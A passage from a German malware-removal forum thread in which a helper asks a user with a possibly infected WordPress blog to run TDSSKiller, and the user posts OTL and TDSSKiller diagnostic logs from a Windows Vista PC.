Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 286,37 Gb Total Space | 144,67 Gb Free Space | 50,52% Space Free | Partition Type: NTFS
Computer Name: DBOY-PC | User Name: DBoy | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Extra Registry (SafeList) ==========
========== File Associations ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
========== Shell Spawning ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
========== Security Center Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"UacDisableNotify" = 0
"InternetSettingsDisableNotify" = 0
"AutoUpdateDisableNotify" = 0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
"DisableMonitoring" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
"DisableMonitoring" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
"DisableMonitoring" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
========== Firewall Settings ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
========== Authorized Applications List ==========
========== Vista Active Open Ports Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
========== Vista Active Application Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{00A4B43D-F5C2-4E43-BAA2-A4DA203FBBFB}" = protocol=6 | dir=in | app=c:\program files\spyware terminator\spywareterminator.exe |
"{0254094A-787C-415A-974E-B58C07442C81}" = protocol=17 | dir=in | app=c:\program files\spyware terminator\spywareterminator.exe |
"{0B348AF7-E67D-430C-BB10-327426EA8747}" = protocol=17 | dir=in | app=c:\program files\spyware terminator\spywareterminatorupdate.exe |
"{14E97564-05D3-4046-82C4-D386044818A1}" = dir=in | app=c:\program files\itunes\itunes.exe |
"{1629B7F9-E2BE-4B85-A5E9-09463BCD24D6}" = protocol=6 | dir=in | app=c:\windows\system32\supdsvc.exe |
"{441936B6-5493-4F95-9CE8-D2F060015728}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{44896900-FD88-48DF-8388-D4410F7EF9FE}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe |
"{5F994E0C-A0AC-40F2-B092-61C72A35CDB3}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe |
"{6ACCC191-7896-4A05-849D-C5929230FC48}" = protocol=6 | dir=in | app=c:\program files\spyware terminator\spywareterminatorupdate.exe |
"{9F94A554-19D2-4C63-AE10-DBD50597C9D8}" = protocol=17 | dir=in | app=c:\windows\system32\supdsvc.exe |
"{C2F8D932-A5C1-4F7A-BE3A-A5280D1AAF86}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{C3C9975A-81D7-478A-ABF6-6B64E3F20934}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{E9BCACE2-FBC9-4A5D-BC4D-3C5144A6D1BB}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe |
"{EA18CCE3-50A0-4D78-8F20-3282D60DD3BE}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe |
"{F402A1B8-F25F-45AC-BBCF-0A6837211BAA}" = dir=in | app=c:\program files\skype\phone\skype.exe |
========== HKEY_LOCAL_MACHINE Uninstall List ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{005B94DC-2954-CC01-27C4-2D369D037EE0}" = CCC Help Polish
"{024AA2AC-FFA9-1806-6BB5-B7725E81B133}" = CCC Help Greek
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{067CA42C-B66D-9995-041D-39A998AC0DB9}" = CCC Help Japanese
"{078B7B83-4F8E-30F3-1F6C-27CB7A58B34F}" = CCC Help Portuguese
"{07AD1E36-8AF3-54AA-3ADF-757FF315BA0B}" = Catalyst Control Center Graphics Previews Vista
"{0849C3F0-2084-8CBF-3C7C-ADBBE2F4C885}" = Catalyst Control Center InstallProxy
"{0969AF05-4FF6-4C00-9406-43599238DE0D}" = ASUS Splendid Video Enhancement Technology
"{0C3D4387-58C3-03FA-9250-E80587ED1970}" = Catalyst Control Center Localization French
"{0EE024E4-7A22-5C59-CB86-D2163B4A5940}" = Catalyst Control Center Graphics Full Existing
"{0F3C61B5-3051-4DE6-8A6A-45100BCC1F41}" = Dolby Control Center
"{12E6E331-91E3-2964-5E42-FD5101EC1924}" = Skins
"{13303431-D0FE-AA95-BEBB-DD936E89129D}" = CCC Help French
"{179AF346-87A7-047D-3034-08D379B06512}" = Catalyst Control Center Localization Danish
"{180C2A98-E757-3FE1-9118-3106F696AD64}" = CCC Help Finnish
"{1821904F-DAD2-ADF5-8F1C-32AA87DA9099}" = CCC Help Thai
"{1B003CCD-DD4C-C45A-5E64-CF2F677735E4}" = Catalyst Control Center Localization Hungarian
"{1C8521E5-5A7B-4A4E-A9CD-AD53116EAEE0}" = ASUS Data Security Manager
"{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}" = ASUS LifeFrame3
"{20E2C98F-37F6-3AEE-3EEB-0817E40C1B5E}" = Catalyst Control Center Localization Thai
"{214B35FA-D554-BA98-C46D-8543CE723D59}" = Catalyst Control Center Localization Turkish
"{23990464-BE2A-1041-2436-A9EA742B84D4}" = Catalyst Control Center Graphics Light
"{2480C7AD-DD7D-26B4-E4A0-04CAC853ADAF}" = Catalyst Control Center Localization Greek
"{27CC6AB1-E72B-4179-AF1A-EAE507EBAF51}_is1" = ConvertHelper 2.2
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros Client Installation Program
"{28F5F2A0-6A42-FB10-9468-8218592804A6}" = CCC Help Italian
"{2F8C0EC4-ECCE-35D3-163D-B1BE983C902E}" = Catalyst Control Center Localization Japanese
"{308A38F5-3061-64FE-698C-9E30BE7AE7F4}" = Catalyst Control Center Localization Dutch
"{37B93E3B-991E-0E7E-DD8E-F5836622397F}" = ATI Catalyst Install Manager
"{39758F7A-E763-917E-E7BE-081561D0D9AB}" = CCC Help Norwegian
"{3B05F2FB-745B-4012-ADF2-439F36B2E70B}" = ATKOSD2
"{3B939E1F-6E91-D459-1876-685B0C152704}" = Catalyst Control Center Localization Swedish
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{415B2719-AD3A-4944-B404-C472DB6085B3}" = Cisco EAP-FAST Module
"{459699C3-9430-4381-964B-4248D87B49F9}" = Apple Mobile Device Support
"{4DD0A3FE-82C3-3DF4-019F-2F1F71032830}" = ccc-core-static
"{529125EF-E3AC-4B74-97E6-F688A7C0F1BF}" = Paint.NET v3.5.10
"{56736259-613E-4A3B-B428-6235F2E76F44}_is1" = Spyware Terminator 2012
"{58C613C0-74A9-2753-FDDB-7E250DA1A775}" = CCC Help Chinese Standard
"{64F12E84-C845-6131-ACC4-71E884E58D32}" = Catalyst Control Center Localization Italian
"{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}" = Cisco PEAP Module
"{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}" = ASUS CopyProtect
"{6B8C292E-38D1-70BC-200B-08A855200B56}" = Catalyst Control Center Localization Chinese Traditional
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{73E17E13-EE46-1D1A-7240-C9B17FA07A58}" = CCC Help Hungarian
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7DE5AA66-A8CE-8689-2A1A-C7D679EDD038}" = CCC Help Chinese Traditional
"{804EC25F-031C-692F-9FEF-F9EC6E9A5BFF}" = CCC Help Swedish
"{83770D14-21B9-44B3-8689-F7B523F94560}" = Cisco LEAP Module
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{83F73CB1-7705-49D1-9852-84D839CA2A45}" = Wireless Console 2
"{86D4B82A-ABED-442A-BE86-96357B70F4FE}" = Ask Toolbar
"{88E9BEAC-B245-9C4E-C4F0-F5D8918CF8E8}" = CCC Help Czech
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{94F29521-B6BB-ADBF-183A-4DEFD1CB123A}" = Catalyst Control Center Localization Korean
"{976AF33B-E8BB-968F-D2E9-2956ECCDB695}" = Catalyst Control Center Localization Spanish
"{9A01320F-7C1D-8B61-B96D-6F62C0662B62}" = Catalyst Control Center Localization Norwegian
"{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}" = ASUS Power4Gear eXtreme
"{A13F629F-58F2-4820-81AC-356956B4AF08}" = CCC Help Danish
"{A5B8FB6E-2D93-EA96-41D2-0A8DE245463E}" = ccc-utility
"{A8AE28A8-7A3C-DA73-B71B-F0E1E934184F}" = Catalyst Control Center Localization Portuguese
"{AB3C268A-E54B-4F6D-BF97-2DFCEEFA94F5}" = Catalyst Control Center - Branding
"{AC18C2B2-32A3-1405-4404-7A299E804D53}" = Catalyst Control Center Localization Czech
"{AC76BA86-7AD7-1031-7B44-AA1000000001}" = Adobe Reader X (10.1.4) - Deutsch
"{ACA1C809-F50A-B6EA-B7AE-D1E46ABDDF15}" = Catalyst Control Center Graphics Previews Common
"{AF389D43-5DE7-39F6-947B-985F0F722E2F}" = CCC Help Spanish
"{AFE40488-240F-311D-65AB-C5081016DD5A}" = Catalyst Control Center Localization German
"{B0261E53-B6F1-474A-864B-E7C3CBF468E0}" = iTunes
"{B50A4BE8-906F-5E89-825D-7A194F77F915}" = Catalyst Control Center Localization Russian
"{C49EE0A6-96F1-D141-EFB8-525930D8E3F0}" = CCC Help Korean
"{C5245592-6EB6-9D13-55FE-D360A9F5CC97}" = CCC Help Turkish
"{CCE825DB-347A-4004-A186-5F4A6FDD8547}" = Apple Application Support
"{CDC072CD-AB8C-6958-DE84-6FA2236E973C}" = CCC Help German
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D1E5870E-E3E5-4475-98A6-ADD614524ADF}" = ATK Media
"{D2D58C26-6BF8-5203-340E-190CF5B7E23B}" = CCC Help Dutch
"{D3D54F3E-C5C3-443D-978F-87A72E5616E8}" = ATK Generic Function Service
"{D86BEAB5-9A12-E681-2B27-14F45D78439E}" = Catalyst Control Center Graphics Full New
"{DA41F9E9-B878-467F-95E7-27E4D1943533}" = Multimedia Card Reader
"{DB891739-2EB3-45A8-9CBD-941C255CECD4}" = ASUS Touch Pad Extra
"{DBBA3B20-3D85-6426-F00A-F8AFA81D581C}" = Catalyst Control Center Localization Polish
"{DD2D3F4B-BF4F-85C9-1A0F-913D80407B2E}" = Catalyst Control Center Localization Finnish
"{DE10AB76-4756-4913-BE25-55D1C1051F9A}" = WinFlash
"{E3455E2A-A26D-0632-D088-6ACC10C1F9F8}" = CCC Help English
"{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}" = ASUS Live Update
"{EA17F4FC-FDBF-4CF8-A529-2D983132D053}" = Skype™ 6.0
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F2724B69-2CAF-E4F8-A05D-82D858970092}" = Catalyst Control Center Localization Chinese Standard
"{F2C6DD1F-B4ED-A876-8B1D-293A1760C1F8}" = CCC Help Russian
"{F750C986-5310-3A5A-95F8-4EC71C8AC01C}" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"{FE875E53-A922-87D5-DF74-E030D41C54D7}" = Catalyst Control Center Core Implementation
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"AbiWord2" = AbiWord 2.9.2
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Asus_Camera_ScreenSaver" = Asus_Camera_ScreenSaver
"Avira AntiVir Desktop" = Avira Free Antivirus
"EazelBar" = EazelBar
"FileZilla Client" = FileZilla Client 3.6.0
"Free YouTube to MP3 Converter_is1" = Free YouTube to MP3 Converter version 3.11.37.1212
"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Microsoft .NET Framework 4 Client Profile DEU Language Pack" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"Mozilla Firefox 19.0 (x86 de)" = Mozilla Firefox 19.0 (x86 de)
"Mozilla Thunderbird 17.0.3 (x86 de)" = Mozilla Thunderbird 17.0.3 (x86 de)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Notepad++" = Notepad++
"Samsung Universal Print Driver" = Samsung Universal Print Driver
"ShockwaveFlash" = Adobe Flash Player 9 ActiveX
"SplitCam" = SplitCam
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"TeamViewer 8" = TeamViewer 8
"USB 2.0 1.3M UVC WebCam" = USB 2.0 1.3M UVC WebCam
"USB Mass Storage Filter Driver" = Multimedia Card Reader
"VLC media player" = VLC media player 2.0.4
"Webcam Simulator_is1" = Webcam Simulator 1.1
"WinRAR archiver" = WinRAR 4.20 (32-Bit)
"YTdetect" = Yahoo! Detect
========== HKEY_CURRENT_USER Uninstall List ==========
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{79A765E1-C399-405B-85AF-466F52E918B0}" = Avira SearchFree Toolbar plus Web Protection Updater
========== Last 20 Event Log Errors ==========
[ Application Events ]
Error - 21.02.2013 19:41:59 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:00 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:00 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:00 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:00 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:01 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:01 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:01 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 21.02.2013 19:42:01 | Computer Name = DBoy-PC | Source = Windows Search Service | ID = 3013
Description =
Error - 22.02.2013 07:31:46 | Computer Name = DBoy-PC | Source = WinMgmt | ID = 10
Description =
[ System Events ]
Error - 28.11.2012 15:02:54 | Computer Name = DBoy-PC | Source = HTTP | ID = 15016
Description =
Error - 28.11.2012 15:04:11 | Computer Name = DBoy-PC | Source = Microsoft-Windows-LanguagePackSetup | ID = 1001
Description =
Error - 29.11.2012 09:18:26 | Computer Name = DBoy-PC | Source = HTTP | ID = 15016
Description =
Error - 29.11.2012 09:19:56 | Computer Name = DBoy-PC | Source = Microsoft-Windows-LanguagePackSetup | ID = 1001
Description =
Error - 29.11.2012 16:26:33 | Computer Name = DBoy-PC | Source = HTTP | ID = 15016
Description =
Error - 29.11.2012 16:27:26 | Computer Name = DBoy-PC | Source = Microsoft-Windows-LanguagePackSetup | ID = 1001
Description =
Error - 30.11.2012 07:36:21 | Computer Name = DBoy-PC | Source = HTTP | ID = 15016
Description =
Error - 30.11.2012 07:37:23 | Computer Name = DBoy-PC | Source = Microsoft-Windows-LanguagePackSetup | ID = 1001
Description =
Error - 30.11.2012 17:17:00 | Computer Name = DBoy-PC | Source = HTTP | ID = 15016
Description =
Error - 30.11.2012 17:17:54 | Computer Name = DBoy-PC | Source = Microsoft-Windows-LanguagePackSetup | ID = 1001
Description =
< End of report >
|
|
01.03.2013, 17:15
| #8 |
| /// Malware-holic | Wordpress Blog infiziert Mail von Google erhalten Hi warum ist kein vista servicepack 2 instaliert? Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
02.03.2013, 01:23
| #9 |
| | Wordpress Blog infiziert Mail von Google erhalten Guten Abend Markus. Brauche ich das Service Pack 2? Hier schonmal das log File, schicke dir gleich noch per Mail die Dateien. Code:
ATTFilter 01:19:01.0599 4660 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
01:19:01.0802 4660 ============================================================
01:19:01.0802 4660 Current date / time: 2013/03/02 01:19:01.0802
01:19:01.0802 4660 SystemInfo:
01:19:01.0802 4660
01:19:01.0802 4660 OS Version: 6.0.6001 ServicePack: 1.0
01:19:01.0802 4660 Product type: Workstation
01:19:01.0802 4660 ComputerName: DBOY-PC
01:19:01.0802 4660 UserName: DBoy
01:19:01.0802 4660 Windows directory: C:\Windows
01:19:01.0802 4660 System windows directory: C:\Windows
01:19:01.0802 4660 Processor architecture: Intel x86
01:19:01.0802 4660 Number of processors: 2
01:19:01.0802 4660 Page size: 0x1000
01:19:01.0802 4660 Boot type: Normal boot
01:19:01.0802 4660 ============================================================
01:19:03.0799 4660 Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 (298.09 Gb), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
01:19:03.0799 4660 ============================================================
01:19:03.0799 4660 \Device\Harddisk0\DR0:
01:19:03.0799 4660 MBR partitions:
01:19:03.0799 4660 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x1771000, BlocksNum 0x23CBD000
01:19:03.0799 4660 ============================================================
01:19:03.0830 4660 C: <-> \Device\Harddisk0\DR0\Partition1
01:19:03.0830 4660 ============================================================
01:19:03.0830 4660 Initialize success
01:19:03.0830 4660 ============================================================
01:19:16.0513 5804 ============================================================
01:19:16.0513 5804 Scan started
01:19:16.0513 5804 Mode: Manual; SigCheck; TDLFS;
01:19:16.0513 5804 ============================================================
01:19:17.0855 5804 ================ Scan system memory ========================
01:19:17.0855 5804 System memory - ok
01:19:17.0855 5804 ================ Scan services =============================
01:19:18.0510 5804 [ FCB8C7210F0135E24C6580F7F649C73C ] ACPI C:\Windows\system32\drivers\acpi.sys
01:19:18.0666 5804 ACPI - ok
01:19:18.0806 5804 [ D19C4EE2AC7C47B8F5F84FFF1A789D8A ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
01:19:18.0822 5804 AdobeARMservice - ok
01:19:18.0962 5804 [ 9942DC4CC265CDA00486504444EF521D ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
01:19:18.0978 5804 AdobeFlashPlayerUpdateSvc - ok
01:19:19.0056 5804 [ 04F0FCAC69C7C71A3AC4EB97FAFC8303 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
01:19:19.0196 5804 adp94xx - ok
01:19:19.0243 5804 [ 60505E0041F7751BDBB80F88BF45C2CE ] adpahci C:\Windows\system32\drivers\adpahci.sys
01:19:19.0305 5804 adpahci - ok
01:19:19.0352 5804 [ 8A42779B02AEC986EAB64ECFC98F8BD7 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
01:19:19.0368 5804 adpu160m - ok
01:19:19.0446 5804 [ 241C9E37F8CE45EF51C3DE27515CA4E5 ] adpu320 C:\Windows\system32\drivers\adpu320.sys
01:19:19.0461 5804 adpu320 - ok
01:19:19.0664 5804 [ C0BF554D2277F7A4C735D475ADE2E3B2 ] ADSMService C:\Program Files\ASUS\ASUS Data Security Manager\ADSMSrv.exe
01:19:19.0727 5804 ADSMService ( UnsignedFile.Multi.Generic ) - warning
01:19:19.0727 5804 ADSMService - detected UnsignedFile.Multi.Generic (1)
01:19:19.0820 5804 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
01:19:19.0945 5804 AeLookupSvc - ok
01:19:20.0085 5804 [ 48EB99503533C27AC6135648E5474457 ] AFD C:\Windows\system32\drivers\afd.sys
01:19:20.0117 5804 AFD - ok
01:19:20.0148 5804 [ 13F9E33747E6B41A3FF305C37DB0D360 ] agp440 C:\Windows\system32\drivers\agp440.sys
01:19:20.0163 5804 agp440 - ok
01:19:20.0195 5804 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
01:19:20.0210 5804 aic78xx - ok
01:19:20.0241 5804 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
01:19:20.0397 5804 ALG - ok
01:19:20.0429 5804 [ 9EAEF5FC9B8E351AFA7E78A6FAE91F91 ] aliide C:\Windows\system32\drivers\aliide.sys
01:19:20.0444 5804 aliide - ok
01:19:20.0475 5804 [ C47344BC706E5F0B9DCE369516661578 ] amdagp C:\Windows\system32\drivers\amdagp.sys
01:19:20.0491 5804 amdagp - ok
01:19:20.0507 5804 [ 9B78A39A4C173FDBC1321E0DD659B34C ] amdide C:\Windows\system32\drivers\amdide.sys
01:19:20.0538 5804 amdide - ok
01:19:20.0631 5804 [ 18F29B49AD23ECEE3D2A826C725C8D48 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
01:19:20.0678 5804 AmdK7 - ok
01:19:20.0741 5804 [ 93AE7F7DD54AB986A6F1A1B37BE7442D ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
01:19:20.0787 5804 AmdK8 - ok
01:19:21.0053 5804 [ 459465DA28E49B358ECFE0D788F328F4 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
01:19:21.0084 5804 AntiVirSchedulerService - ok
01:19:21.0146 5804 [ BCDD17E8469D647A71B347C4B6F86685 ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
01:19:21.0177 5804 AntiVirService - ok
01:19:21.0209 5804 [ D05B3EB1F1C8C7199D84C9D68D35FD78 ] AntiVirWebService C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
01:19:21.0255 5804 AntiVirWebService - ok
01:19:21.0333 5804 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
01:19:21.0365 5804 Appinfo - ok
01:19:21.0427 5804 [ A5299D04ED225D64CF07A568A3E1BF8C ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
01:19:21.0536 5804 Apple Mobile Device - ok
01:19:21.0567 5804 [ 5D2888182FB46632511ACEE92FDAD522 ] arc C:\Windows\system32\drivers\arc.sys
01:19:21.0583 5804 arc - ok
01:19:21.0614 5804 [ 5E2A321BD7C8B3624E41FDEC3E244945 ] arcsas C:\Windows\system32\drivers\arcsas.sys
01:19:21.0630 5804 arcsas - ok
01:19:21.0692 5804 [ 4385E371C25C94C804E9D3152BD9E1F7 ] AsDsm C:\Windows\system32\drivers\AsDsm.sys
01:19:21.0755 5804 AsDsm - ok
01:19:21.0786 5804 [ 7B4D08D2017AC06689D422E06C43F0AA ] ASMMAP C:\Program Files\ATKGFNEX\ASMMAP.sys
01:19:21.0879 5804 ASMMAP - ok
01:19:21.0911 5804 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
01:19:21.0942 5804 AsyncMac - ok
01:19:21.0957 5804 [ 2D9C903DC76A66813D350A562DE40ED9 ] atapi C:\Windows\system32\drivers\atapi.sys
01:19:21.0973 5804 atapi - ok
01:19:22.0067 5804 [ 600EFE56F37ADBD65A0FB076B50D1B8D ] athr C:\Windows\system32\DRIVERS\athr.sys
01:19:22.0129 5804 athr - ok
01:19:22.0254 5804 [ 3EF35532E4412C14F289D082CAD25360 ] Ati External Event Utility C:\Windows\system32\Ati2evxx.exe
01:19:22.0316 5804 Ati External Event Utility - ok
01:19:22.0503 5804 [ B6F3E32C0A1C38CD7526265221DE192C ] atikmdag C:\Windows\system32\DRIVERS\atikmdag.sys
01:19:22.0659 5804 atikmdag - ok
01:19:22.0784 5804 [ 7C157574A181B19B9DCF5F339E25337E ] ATKGFNEXSrv C:\Program Files\ATKGFNEX\GFNEXSrv.exe
01:19:22.0800 5804 ATKGFNEXSrv ( UnsignedFile.Multi.Generic ) - warning
01:19:22.0800 5804 ATKGFNEXSrv - detected UnsignedFile.Multi.Generic (1)
01:19:22.0893 5804 [ 42076E29AAFA0830A2C5D4E310F58DD1 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
01:19:22.0940 5804 AudioEndpointBuilder - ok
01:19:22.0971 5804 [ 42076E29AAFA0830A2C5D4E310F58DD1 ] Audiosrv C:\Windows\System32\Audiosrv.dll
01:19:23.0018 5804 Audiosrv - ok
01:19:23.0065 5804 [ A5C175039B1D6D85D0E79F5855828E4D ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
01:19:23.0081 5804 avgntflt - ok
01:19:23.0159 5804 [ 37B854C7D1F477E66C5B49C7700C47CC ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
01:19:23.0190 5804 avipbb - ok
01:19:23.0205 5804 [ FFB78D74E1EA5F811341A6E7AC547A46 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
01:19:23.0221 5804 avkmgr - ok
01:19:23.0283 5804 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
01:19:23.0330 5804 Beep - ok
01:19:23.0377 5804 [ 8582E233C346AEFE759833E8A30DD697 ] BFE C:\Windows\System32\bfe.dll
01:19:23.0424 5804 BFE - ok
01:19:23.0549 5804 [ 02ED7B4DBC2A3232A389106DA7515C3D ] BITS C:\Windows\System32\qmgr.dll
01:19:23.0689 5804 BITS - ok
